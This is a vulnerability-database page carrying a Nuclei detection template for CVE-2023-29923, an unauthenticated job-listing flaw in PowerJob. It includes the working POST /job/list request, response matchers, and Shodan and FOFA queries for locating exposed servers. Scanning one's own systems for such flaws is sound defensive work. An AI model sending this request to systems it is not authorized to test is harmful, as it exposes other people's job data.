Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-29923
HistoryMay 14, 2023 - 3:14 a.m.

PowerJob <=4.3.2 - Unauthenticated Access

2023-05-1403:14:15
ProjectDiscovery
github.com
2
vulnerable
unauthorized access
sensitive information
malicious actions
upgrade
patches
authentication bypass
powerjob
powerjob v4.3.1
cve-2023-29923
cwe-276
http
post
application/json

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.1 Medium

AI Score

Confidence

High

0.022 Low

EPSS

Percentile

89.4%

PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
id: CVE-2023-29923

info:
  name: PowerJob <=4.3.2 - Unauthenticated Access
  author: For3stCo1d
  severity: medium
  description: |
    PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions.
  remediation: |
    Upgrade PowerJob to a version higher than 4.3.2 or apply the necessary patches to fix the authentication bypass issue.
  reference:
    - https://github.com/PowerJob/PowerJob/issues/587
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29923
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Le1a/CVE-2023-29923
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-29923
    cwe-id: CWE-276
    epss-score: 0.01633
    epss-percentile: 0.8751
    cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: powerjob
    product: powerjob
    shodan-query: http.html:"powerjob"
    fofa-query:
      - app="PowerJob"
      - app="powerjob"
      - body="powerjob"
  tags: cve2023,cve,powerjob,unauth

http:
  - raw:
      - |
        POST /job/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"appId":1,"index":0,"pageSize":10}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":true,"data":{"index":0,"pageSize":10,'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008812501948bfde98e323a23aa07dff8cc2f85c867074eb9052aec2e781cfc1cb022100a1dfc72abb0b477705b0c37bb64cf66467246032b66f4dd5e70f8da86074d509:922c64590222798bb761d5b6d8e72950

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.1 Medium

AI Score

Confidence

High

0.022 Low

EPSS

Percentile

89.4%